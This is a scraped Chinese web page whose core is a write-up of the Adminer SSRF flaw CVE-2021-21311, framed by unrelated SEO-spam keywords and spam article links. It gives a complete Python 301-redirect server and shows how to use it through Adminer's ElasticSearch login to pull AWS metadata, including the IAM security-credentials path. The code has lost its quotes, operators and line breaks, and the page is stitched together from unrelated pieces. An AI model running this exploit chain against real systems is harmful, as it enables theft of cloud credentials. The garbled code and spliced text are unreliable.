当前位置: 首页 > news >正文

做国际物流在哪些网站找客户大型网站建设的价格

做国际物流在哪些网站找客户,大型网站建设的价格,申请免费网站域名,移动互联网开发培训Adminer是一个PHP编写的开源数据库管理工具#xff0c;支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。 在其4.0.0到4.7.9版本之间#xff0c;连接 ElasticSearch 和 ClickHouse 数据库时存在一处服务端请求伪造漏洞#xff08…Adminer是一个PHP编写的开源数据库管理工具支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。 在其4.0.0到4.7.9版本之间连接 ElasticSearch 和 ClickHouse 数据库时存在一处服务端请求伪造漏洞SSRF。 参考连接 https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6 https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-21311.yaml 1.在Adminer登录页面选择ElasticSearch作为系统目标并在server字段填写example.com点击登录即可看到example.com返回的400错误页面展示在页面中 Vulnerability-Wiki/docs-base/docs/webapp/Adminer-SSRF漏洞-CVE-2021-21311.md at master · Threekiii/Vulnerability-Wiki (github.com) 使用管理员发送任意get请求并从内部服务器检索JSON响应的方法。可以从AWS元数据服务中提取AWS访问密钥。 参考链接 SSRF in adminer · CVE-2021-21311 · GitHub Advisory Database · GitHubhttps://gist.github.com/bpsizemore/227141941c5075d96a34e375c63ae3bd 首先启动一个python服务器该服务器侦听传入的连接并以301重定向响应到任意选择的主机。在此示例情况下重定向指向AWS元数据服务 http://169.254.169.254/latest/meta-data/instance-id然后在Adminer中使用Elasticsearch登录模块“登录”运行python代码的服务器这导致Adminer从包含服务器的AWS实例ID的元数据服务器打印json响应。 重定向请求的python脚本 #!/usr/bin/env pythonimport SimpleHTTPServer import SocketServer import sys import argparsedef redirect_handler_factory(url):Returns a request handler class that redirects to supplied urlclass RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):def do_GET(self):self.send_response(301)self.send_header(Location, url)self.end_headers()def do_POST(self):self.send_response(301)self.send_header(Location, url)self.end_headers()return RedirectHandlerdef main():parser argparse.ArgumentParser(descriptionHTTP redirect server)parser.add_argument(--port, -p, actionstore, typeint, default80, helpport to listen on)parser.add_argument(--ip, -i, actionstore, default, helphost interface to listen on)parser.add_argument(redirect_url, actionstore)myargs parser.parse_args()redirect_url myargs.redirect_urlport myargs.porthost myargs.ipredirectHandler redirect_handler_factory(redirect_url)handler SocketServer.TCPServer((host, port), redirectHandler)print(serving at port %s % port)handler.serve_forever()if __name__ __main__:main() http://169.254.169.254/latest/meta-data/iam/security-credentials/ //列出服务器的可用角色。
http://www.w-s-a.com/news/37935/

相关文章:

  • 合肥网站建设市场分析网站收录后怎么做排名
  • 湖南企业网站建设如何推广手机网站
  • 网站建设项目经历网站推广服务 商务服务
  • 加强网站的建设福州seo排名外包
  • 做婚庆找什么网站有专门为个人网站做推广的吗
  • 网站搭建要求模板学编程需要英语基础吗
  • 网上如何建网站卖量具净水机企业网站源码
  • 网站推广 软件规划设计公司年终总结
  • 视频网站开发方法微站网建站系统
  • 渐变网站网页界面设计的宗旨是什么
  • 网站排名提升工具免费韶关做网站公司
  • 做网站一个月可以赚多少钱东营市建设工程招标网
  • 网站开发工具阿里云怎么做网站
  • 用html做静态网站成都专业logo设计公司
  • 哪里有免费建站平台233小游戏网页版在线玩
  • 为什么我的网站做不起来网站能搜索到
  • 方又圆网站建设信息流广告二级代理
  • 公司管理网站首页网站后台编辑框不显示
  • aspnet网站开发模板备案 网站建设方案书
  • 营销软件网站wordpress优秀的破解主题
  • 卧龙区网站建设国内漂亮网站欣赏
  • 服装 网站模板 wordpress石家庄做网站的公司有哪些
  • 惠州技术支持网站建设百度怎样注册免费的网站
  • 无锡哪里有做网站的公司泸州网站建设公司
  • 怎么进行网站推广jsp可以做那些小网站
  • 懒人手机网站wordpress修改秒速
  • WordPress资讯网站用花生壳做网站
  • 关于营销方面的网站建设网站怎么克隆
  • 站长网seo综合查询工具电商公司简介
  • 全能网站建设教程广告制作公司需要什么设备